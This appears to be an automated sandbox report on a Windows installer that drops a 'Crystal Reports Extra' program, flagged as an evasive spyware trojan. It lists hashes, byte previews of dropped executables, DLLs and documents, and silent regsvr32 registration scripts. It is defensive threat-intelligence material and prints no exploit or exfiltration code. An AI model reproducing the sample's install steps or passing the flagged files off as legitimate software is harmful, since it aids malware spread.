                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal76.troj.spyw.evad.winEXE@9/191@0/1
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 33.6% (good quality ratio 32.8%)
                                                          • Quality average: 79.9%
                                                          • Quality standard deviation: 23.8%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 173.222.108.210, 173.222.108.226, 20.199.120.151, 80.67.82.211, 80.67.82.235, 20.199.120.85
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:32:02API Interceptor1x Sleep call for process: CrystalReports.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp
                                                          Process:C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3194368
                                                          Entropy (8bit):6.32732791778373
                                                          Encrypted:false
                                                          SSDEEP:49152:qEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTV+333TY:692bz2Eb6pd7B6bAGx7s333T
                                                          MD5:EEB69F7B86959AE72B9D37443FB7F3D0
                                                          SHA1:EA687885FF8711724639134819BFFFE3934E0CC1
                                                          SHA-256:5A3CCC92F7966F8A3F8D0FBC50CEF8452560341F4E23C769247B3CDD0818AF11
                                                          SHA-512:0EB7B152B595154B5221CC916A5AA79181E5EC5CF87D9CBEE734A2DD7E1512504AF19D2B857337A4CE956935E0A1C0E9E6BABB91AE5855EB9952523497538374
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.......................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@..............1.......0.............@..@........................................................
                                                          C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          Process:C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3194368
                                                          Entropy (8bit):6.32732791778373
                                                          Encrypted:false
                                                          SSDEEP:49152:qEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTV+333TY:692bz2Eb6pd7B6bAGx7s333T
                                                          MD5:EEB69F7B86959AE72B9D37443FB7F3D0
                                                          SHA1:EA687885FF8711724639134819BFFFE3934E0CC1
                                                          SHA-256:5A3CCC92F7966F8A3F8D0FBC50CEF8452560341F4E23C769247B3CDD0818AF11
                                                          SHA-512:0EB7B152B595154B5221CC916A5AA79181E5EC5CF87D9CBEE734A2DD7E1512504AF19D2B857337A4CE956935E0A1C0E9E6BABB91AE5855EB9952523497538374
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.......................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@..............1.......0.............@..@........................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4910592
                                                          Entropy (8bit):6.572031041695352
                                                          Encrypted:false
                                                          SSDEEP:49152:dYQUcTX0/fq7b81I89fNkiiD3khqwqREQDfqtd4keAG4/lqQNOhw5XlAzmGLateC:5zB7b8O8QZrjwwhw5XlACGm8CtxARti
                                                          MD5:11DD538F1BF5F174834DBA334964A691
                                                          SHA1:3B080FA94C71CFAB65A0CD407EACAC4C2B1B2378
                                                          SHA-256:1BC4B73613228169EF7F57222EF36A6D9B3A2F3347EFA2228C53DC3B83559888
                                                          SHA-512:8E0A0455BDECBA073B06BE610917C71B6082745DF91B34C2663BC8D86361E71EA8FFF3D222E087AA3560A1AEE3455CA1DC7F2957726D86B001F4124DE220F911
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......!...ep.ep.ep.l.A.up.../.ap.7..zp.7..ip.7..bp..-.vp.7..ap.q..ip....tp.ep.9y....dp.3..eq.3.-.dp.epE.dp.3..dp.Richep.9;..N..Rich.N..........PE..L.....Ra.................T6.........dQ(......p6...@..........................@K.......J.......................................G.P....pH.H.............................D.p.....................D.....@.D.@............p6..............................text....S6......T6................. ....rdata.......p6......X6.............@..@.data....4...0G.......G.............@....rsrc...H....pH......(H.............@..@........................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Docs\Quick Start.pdf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PDF document, version 1.4
                                                          Category:dropped
                                                          Size (bytes):101222
                                                          Entropy (8bit):6.983769460731426
                                                          Encrypted:false
                                                          SSDEEP:1536:loTqjohGkVSC9aZHu40Y7w58PxeVPM6b24k8frIP4T8m0qd4gBE:1lHfEU03kPm8m0qzBE
                                                          MD5:1BDDB792FEC19750CCBBB8352B2B8FFE
                                                          SHA1:DD300CB011E0D9ABD57F41503E31367167FDDD68
                                                          SHA-256:58045223424D936ADCEFC09C06F635C30A1AABA0335FC5D5954B43833B53FD72
                                                          SHA-512:1438030735AA9549E13B2E275210A9C6BB825329ACD568D8C38F8DEBE04474CE01BE5E44EF6B76913D47B59D33C58954615754CFFBCE67DE04F9CCBAA8341631
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: %PDF-1.4.%......1 0 obj.<</Metadata 2 0 R/Pages 3 0 R/Type/Catalog/ViewerPreferences<</Direction/L2R>>>>.endobj.2 0 obj.<</Length 43322/Subtype/XML/Type/Metadata>>stream..<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreateDate>2010-05-21T13:47:48-04:00</xmp:CreateDate>. <xmp:MetadataDate>2010-05-21T13:47:48-04:00</xmp:MetadataDate>. <xmp:ModifyDate>2010-05-21T13:47:48-04:00</xmp:ModifyDate>. <xmp:CreatorTool>Adobe InCopy CS5 (7.0)</xmp:CreatorTool>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.ad
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Docs\is-PSH61.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PDF document, version 1.4
                                                          Category:dropped
                                                          Size (bytes):101222
                                                          Entropy (8bit):6.983769460731426
                                                          Encrypted:false
                                                          SSDEEP:1536:loTqjohGkVSC9aZHu40Y7w58PxeVPM6b24k8frIP4T8m0qd4gBE:1lHfEU03kPm8m0qzBE
                                                          MD5:1BDDB792FEC19750CCBBB8352B2B8FFE
                                                          SHA1:DD300CB011E0D9ABD57F41503E31367167FDDD68
                                                          SHA-256:58045223424D936ADCEFC09C06F635C30A1AABA0335FC5D5954B43833B53FD72
                                                          SHA-512:1438030735AA9549E13B2E275210A9C6BB825329ACD568D8C38F8DEBE04474CE01BE5E44EF6B76913D47B59D33C58954615754CFFBCE67DE04F9CCBAA8341631
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: %PDF-1.4.%......1 0 obj.<</Metadata 2 0 R/Pages 3 0 R/Type/Catalog/ViewerPreferences<</Direction/L2R>>>>.endobj.2 0 obj.<</Length 43322/Subtype/XML/Type/Metadata>>stream..<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreateDate>2010-05-21T13:47:48-04:00</xmp:CreateDate>. <xmp:MetadataDate>2010-05-21T13:47:48-04:00</xmp:MetadataDate>. <xmp:ModifyDate>2010-05-21T13:47:48-04:00</xmp:ModifyDate>. <xmp:CreatorTool>Adobe InCopy CS5 (7.0)</xmp:CreatorTool>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.ad
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):147456
                                                          Entropy (8bit):5.132194016685221
                                                          Encrypted:false
                                                          SSDEEP:3072:Ju6aJX0iugleTtmPzeLmQlV9MxSh356/JwQ3QklkuSmpKFb4NbkR2:9aJX0i9PaLmQlVxhw53w5bsbk
                                                          MD5:D817A6EC84CC47899F249B2C03B5F985
                                                          SHA1:5EBF96041A694C85BAD7F71F0679F64700EE272E
                                                          SHA-256:0A5DC4026BCEEB4AFDDDD73E3E16CC7224B2640E86A379D9AFE6E5A81CE1ECDC
                                                          SHA-512:96D161C7844304D4466384F5A25E27E54F0A79FEFC51E0656746837D31772EB84AB203E13686391B5FA0126F0F3C705876C1C1AE8EEF4E4F0EC67C8C379918A2
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9..F...........!......... ......n-... ...@....... .......................................................................-..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):77824
                                                          Entropy (8bit):5.10431466984057
                                                          Encrypted:false
                                                          SSDEEP:1536:amAnsoKlNNzfkEMqqU+2bbbAV2/S2eVLVUJfKFjJ:aooKlNNQEMqqDL2/MJUJfKFjJ
                                                          MD5:6316C4082CACF8F3F4F22DAEF56CB15C
                                                          SHA1:CEA3DE90B20396B092797EC8C7E241E822C8FAED
                                                          SHA-256:5594B08C79A4D188A674713011CD516618FA36D2F988F7D353FB3370939A4062
                                                          SHA-512:E1E0A6440F91B208B61775E30D8FC1BE299A298E00ED564CA7C74FA8728738AF66E6C3C0805553ABBC4A8D2838CD21BFDE61AC2322FFF4E62AC4D6796A0821BC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........`.u.3.u.3.u.3^i.3.u.3.u.3.u.3.j.3.u.3.u.3.u.3.j.3.u.3.V.3.u.3.i.3.u.35j.3.u.35j.3.u.3es.3.u.35j.3.u.3Rich.u.3................PE..L...V.jD...........!.....p...........f.......................................0............................................................................... ..........................................................P............................text....a.......p.................. ..`.rdata..ke.......p..................@..@.data...L...........................@....CRT................................@....rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\License.rtf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:Rich Text Format data, version 1, ANSI
                                                          Category:dropped
                                                          Size (bytes):64156
                                                          Entropy (8bit):5.315320157680189
                                                          Encrypted:false
                                                          SSDEEP:768:zgv96cAAxEzYDlHnnDx2QAAw44RmkXOQQrWU0CW246jm/grBT8UojwKA7npBL4Cc:apRyHEQmtmMy4uIxju0TfTRY
                                                          MD5:8B1E3300D8671530E75C4EA201945457
                                                          SHA1:A7933AE925175F0CF6876506F56583CBBC18E966
                                                          SHA-256:AB5E632345D9CED4F8BCB210BF6E0922A18479E0620943ACD613D7B5C68F473D
                                                          SHA-512:A58A7A2C473CF5E9D81664C30904C18A593C57A873EE9DFA20610594885BE54FB92DEC628DD3DC3D73C7D7F266B20C771447D9B1CD7D3FBA7B66526AE6157184
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: {\rtf1\ansi\ansicpg1251\uc1\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1049\deflangfe1049{\fonttbl{\f0\froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f1\fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f43\froman\fcharset0\fprq2{\*\panose 00000000000000000000}Garamond;}{\f75\fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial (W1){\*\falt Arial};}..{\f78\froman\fcharset0\fprq2 Times New Roman;}{\f76\froman\fcharset238\fprq2 Times New Roman CE;}{\f79\froman\fcharset161\fprq2 Times New Roman Greek;}{\f80\froman\fcharset162\fprq2 Times New Roman Tur;}..{\f81\froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f82\froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f83\froman\fcharset186\fprq2 Times New Roman Baltic;}{\f84\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}..{\f88\fswiss\fcharset0\fprq2 Arial;}{\f86\fswiss\fcharset238\fprq2 Arial CE;}{\f89\fswiss\fcharset161\fprq2 Arial Greek;}{\f90\fswiss\fcharset16
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-BME18.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.1287617936786605
                                                          Encrypted:false
                                                          SSDEEP:3:5lF5lvXJlFQIdwqBlFQJUmdUlFQJoGLEd:NWId1e6qnKGwd
                                                          MD5:DB1BD76FF52FE427A03204673A307B12
                                                          SHA1:72232D601DBEEE8E448AF0CC41D2D517AA56296D
                                                          SHA-256:6C3CEFCA10C5E5676A6EF14E8CA472F8F0A11C3DED7391B14ACB24BF3D7B727C
                                                          SHA-512:1BD2065AC82F7D858EDED6EF3348D9D3CD5F5DFB2772D351B77F737A2378EAA7D7E05D6008A36A852647446FC60C9A388FA51E7A8F401C6C43FC287D70F10A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /u /s LC.dll..regsvr32 /u /s em2vd.ax..regsvr32 /u /s el2ad.ax..regsvr32 /u /s elaudec.ax
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):77824
                                                          Entropy (8bit):5.10431466984057
                                                          Encrypted:false
                                                          SSDEEP:1536:amAnsoKlNNzfkEMqqU+2bbbAV2/S2eVLVUJfKFjJ:aooKlNNQEMqqDL2/MJUJfKFjJ
                                                          MD5:6316C4082CACF8F3F4F22DAEF56CB15C
                                                          SHA1:CEA3DE90B20396B092797EC8C7E241E822C8FAED
                                                          SHA-256:5594B08C79A4D188A674713011CD516618FA36D2F988F7D353FB3370939A4062
                                                          SHA-512:E1E0A6440F91B208B61775E30D8FC1BE299A298E00ED564CA7C74FA8728738AF66E6C3C0805553ABBC4A8D2838CD21BFDE61AC2322FFF4E62AC4D6796A0821BC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........`.u.3.u.3.u.3^i.3.u.3.u.3.u.3.j.3.u.3.u.3.u.3.j.3.u.3.V.3.u.3.i.3.u.35j.3.u.35j.3.u.3es.3.u.35j.3.u.3Rich.u.3................PE..L...V.jD...........!.....p...........f.......................................0............................................................................... ..........................................................P............................text....a.......p.................. ..`.rdata..ke.......p..................@..@.data...L...........................@....CRT................................@....rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-NST0V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:Rich Text Format data, version 1, ANSI
                                                          Category:dropped
                                                          Size (bytes):64156
                                                          Entropy (8bit):5.315320157680189
                                                          Encrypted:false
                                                          SSDEEP:768:zgv96cAAxEzYDlHnnDx2QAAw44RmkXOQQrWU0CW246jm/grBT8UojwKA7npBL4Cc:apRyHEQmtmMy4uIxju0TfTRY
                                                          MD5:8B1E3300D8671530E75C4EA201945457
                                                          SHA1:A7933AE925175F0CF6876506F56583CBBC18E966
                                                          SHA-256:AB5E632345D9CED4F8BCB210BF6E0922A18479E0620943ACD613D7B5C68F473D
                                                          SHA-512:A58A7A2C473CF5E9D81664C30904C18A593C57A873EE9DFA20610594885BE54FB92DEC628DD3DC3D73C7D7F266B20C771447D9B1CD7D3FBA7B66526AE6157184
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: {\rtf1\ansi\ansicpg1251\uc1\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1049\deflangfe1049{\fonttbl{\f0\froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f1\fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f43\froman\fcharset0\fprq2{\*\panose 00000000000000000000}Garamond;}{\f75\fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial (W1){\*\falt Arial};}..{\f78\froman\fcharset0\fprq2 Times New Roman;}{\f76\froman\fcharset238\fprq2 Times New Roman CE;}{\f79\froman\fcharset161\fprq2 Times New Roman Greek;}{\f80\froman\fcharset162\fprq2 Times New Roman Tur;}..{\f81\froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f82\froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f83\froman\fcharset186\fprq2 Times New Roman Baltic;}{\f84\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}..{\f88\fswiss\fcharset0\fprq2 Arial;}{\f86\fswiss\fcharset238\fprq2 Arial CE;}{\f89\fswiss\fcharset161\fprq2 Arial Greek;}{\f90\fswiss\fcharset16
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-UREBA.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):88
                                                          Entropy (8bit):4.147114079371796
                                                          Encrypted:false
                                                          SSDEEP:3:5jFPvXJjFPwqBjFjmdUjFLGLEU:7b1/qKGwU
                                                          MD5:26CB1034EDD008ABD00D7A1F935B61C5
                                                          SHA1:2E45FDDD2280A14A96B8CB1ED8B8E4C9707F9C41
                                                          SHA-256:F4E0FBC265020D01AAF4F451FFD9319AB3742AEEF949AF7A38260790FF6E4670
                                                          SHA-512:EA300163B36C9EE397812B6DC4FBA07849014F6C57D5C2F07E243414C4EE1E156A4100D7EB4BC555AC48B3EDA2C7990D0329D3C1ADEDE29F54AE1FF7C17FB480
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /s LC.dll..regsvr32 /s em2vd.ax..regsvr32 /s el2ad.ax..regsvr32 /s elaudec.ax..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\register.cmd (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):88
                                                          Entropy (8bit):4.147114079371796
                                                          Encrypted:false
                                                          SSDEEP:3:5jFPvXJjFPwqBjFjmdUjFLGLEU:7b1/qKGwU
                                                          MD5:26CB1034EDD008ABD00D7A1F935B61C5
                                                          SHA1:2E45FDDD2280A14A96B8CB1ED8B8E4C9707F9C41
                                                          SHA-256:F4E0FBC265020D01AAF4F451FFD9319AB3742AEEF949AF7A38260790FF6E4670
                                                          SHA-512:EA300163B36C9EE397812B6DC4FBA07849014F6C57D5C2F07E243414C4EE1E156A4100D7EB4BC555AC48B3EDA2C7990D0329D3C1ADEDE29F54AE1FF7C17FB480
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /s LC.dll..regsvr32 /s em2vd.ax..regsvr32 /s el2ad.ax..regsvr32 /s elaudec.ax..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\unregister.cmd (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.1287617936786605
                                                          Encrypted:false
                                                          SSDEEP:3:5lF5lvXJlFQIdwqBlFQJUmdUlFQJoGLEd:NWId1e6qnKGwd
                                                          MD5:DB1BD76FF52FE427A03204673A307B12
                                                          SHA1:72232D601DBEEE8E448AF0CC41D2D517AA56296D
                                                          SHA-256:6C3CEFCA10C5E5676A6EF14E8CA472F8F0A11C3DED7391B14ACB24BF3D7B727C
                                                          SHA-512:1BD2065AC82F7D858EDED6EF3348D9D3CD5F5DFB2772D351B77F737A2378EAA7D7E05D6008A36A852647446FC60C9A388FA51E7A8F401C6C43FC287D70F10A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /u /s LC.dll..regsvr32 /u /s em2vd.ax..regsvr32 /u /s el2ad.ax..regsvr32 /u /s elaudec.ax
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\License.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):15099
                                                          Entropy (8bit):4.490145322936716
                                                          Encrypted:false
                                                          SSDEEP:192:s4HVPM3N2zi6547iYOE6k+jLPv4IdQQXyAOiDaoL8HZwM3fxEq/Sl4eAxjf+6:s4Hmv7iE6kY4I9yAO2NL8OMBI4eAxTV
                                                          MD5:D13ADE1829C8B1A1621DB24D91F2D082
                                                          SHA1:A7BD24E809EF9BE6A37EF2BD01D23D4465E979DD
                                                          SHA-256:079952DC637DBAA9806C40A001BF5837079ADE9066F8AA18C80D23507B7E3DA3
                                                          SHA-512:33FCD64FB4881801AC269A4065C2223C0A02EEDD1132EDC0E92EF35CDCC96DB669676681C26FBF3605DD1E8982919BECA1E644935F0C2B39537CD8D2886F41BC
                                                          Malicious:false
                                                          Reputation:unknown
